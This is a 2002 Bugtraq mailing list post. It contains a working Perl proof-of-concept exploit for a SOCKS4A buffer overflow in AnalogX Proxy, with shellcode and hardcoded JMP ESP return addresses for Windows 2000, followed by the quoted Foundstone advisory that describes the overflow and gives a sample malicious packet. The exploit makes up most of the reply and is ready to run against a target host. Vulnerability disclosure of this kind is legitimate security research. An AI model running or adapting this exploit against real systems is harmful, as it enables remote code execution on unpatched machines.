Bugtraq mailing list archives
Re: Foundstone Advisory - Buffer Overflow in AnalogX Proxy (fwd)
From: Kanatoko <anvil () jumperz net>
Date: Sat, 27 Jul 2002 04:21:48 +0900
This is a proof of concept exploit for AnalogX Proxy SOCKS4A buffer overflow. Tested on Japanese Windows 2000 Professional SP2. #!/usr/local/bin/perl #----------------------------------------------------------- # AnalogX Proxy Version 4.10 exploit for Japanese Windows 2000 Pro (SP2) # written by Kanatoko <anvil () jumperz net> # http://www.jumperz.net/ # thanx to: hsj (http://hsj.shadowpenguin.org/) #----------------------------------------------------------- use Socket; $connect_host = "socks.example.com"; $port = 1080; $iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n"; $sock_addr = pack_sockaddr_in($port,$iaddr); socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n"; connect(SOCKET,$sock_addr) || die "Connect Error\n"; select(SOCKET); $|=1; select(STDOUT); # egg written by UNYUN (http://www.shadowpenguin.org/) # 57bytes $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2"; $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7"; $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C"; $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB"; $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF"; $egg .= "notepad.exe"; $buf = "\x04\x01\x00\x19\x00\x00\x00\x01"; $buf .= "A" x 32; $buf .= $egg; $buf .= "\x00"; $buf .= "A" x 144; # JMP ESP in user32.dll( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B # If you use English Windows 2000, try 0x77E2492B $buf .= "\x2B\x49\xdf\x77"; # JMP +0x22 $buf .= "\xEB\x22"; $buf .= "\x00"; print SOCKET $buf; -- Kanatoko <anvil () jumperz net> JUMPER : http://www.jumperz.net/(Japanese) On Mon, 1 Jul 2002 15:54:55 -0600 (MDT) Dave Ahmad <da () securityfocus com> wrote:
Dave Ahmad
SecurityFocus
www.securityfocus.com
---------- Forwarded message ----------
Return-Path: <labs () foundstone com>
Delivered-To: da () securityfocus com
Received: (qmail 13630 invoked from network); 1 Jul 2002 21:32:14 -0000
Received: from unknown (HELO mission.foundstone.com) (66.192.0.2)
by mail.securityfocus.com with SMTP; 1 Jul 2002 21:32:14 -0000
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: Foundstone Advisory - Buffer Overflow in AnalogX Proxy
Date: Mon, 1 Jul 2002 14:37:44 -0700
Message-ID: <9DC8A3D37E31E043BD516142594BDDFAC47577 () MISSION foundstone com>
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Thread-Topic: Foundstone Advisory - Buffer Overflow in AnalogX Proxy
Thread-Index: AcIhR4n3TkCXBJz4TAqNDSFSrIolUg==
From: "Foundstone Labs" <labs () foundstone com>
To: <da () securityfocus com>
----------------------------------------------------------------------
FS Advisory ID: FS-070102-23-AXPR
Release Date: July 1st, 2002
Product: AnalogX Proxy
Vendor: AnalogX (http://www.analogx.com)
Vendor Advisory: See vendor web site
Type: Buffer Overflow
Severity: High
Author: Robin Keir (robin.keir () foundstone com)
Foundstone, Inc.
(http://www.foundstone.com)
Operating Systems: Windows variants
Vulnerable versions: Proxy v4.07 and previous
Foundstone Advisory: http://www.foundstone.com/advisories.htm
---------------------------------------------------------------------
Description
A buffer overflow exists in AnalogX's Proxy software.
Exploitation of this vulnerability allows remote execution of
arbitrary code with the privileges of the Proxy daemon.
Details
Web Proxy overflow
Sending a HTTP proxy request to the target system on TCP port 6588
consisting of a single space character followed by 320 or more
non-space characters followed by 2 carriage-return linefeeds causes
a read access violation in the application. Manually dismissing the
application error message box that is displayed on the affected system
at this point will terminate the process. If the message box is not
manually dismissed then repeated sending of the request causes repeated
access violation message boxes to appear on the affected system up to
the point where the service no longer responds.
Different number of bytes sent cause different error conditions
to occur, such as write access violations and Watcom memory
error dialogs to appear.
Socks4a buffer overflow.
Sending a Sock4a request to the target system on TCP port 1080
consisting
of a hostname section of 140 or more characters will cause a write
access
violation application error. Manually dismissing the application error
message box that is displayed on the affected system at this point will
terminate the process. If the message box is not manually dismissed then
repeated sending of the request causes repeated access violation message
boxes to appear on the affected system up to the point where the service
no longer responds.
An example TCP packet to send is
\x04\x01\x04\x38\x00\x00\x00abcd\x00#\x00
where the '\xXX' characters signify their corresponding HEX binary
values and
the '#' is substituted with the DNS name of 140 or more characters.
Solution:
Refer to the vendor's web site for further details:
http://www.analogx.com
Credits:
Foundstone would like to thank AnalogX for their prompt
response and handling of this problem.
Disclaimer:
The information contained in this advisory is copyright (c) 2002
Foundstone, Inc. and is believed to be accurate at the time of
publishing, but no representation of any warranty is given,
express, or implied as to its accuracy or completeness. In no
event shall the author or Foundstone be liable for any direct,
indirect, incidental, special, exemplary or consequential
damages resulting from the use or misuse of this information.
This advisory may be redistributed, provided that no fee is
assigned and that the advisory is not modified in any way.
Current thread:
- Foundstone Advisory - Buffer Overflow in AnalogX Proxy (fwd) Dave Ahmad (Jul 01)
- NEC's socks5 (Re: Foundstone Advisory - Buffer Overflow in AnalogX Proxy (fwd)) 3APA3A (Jul 03)
- Re: Foundstone Advisory - Buffer Overflow in AnalogX Proxy (fwd) Kanatoko (Jul 26)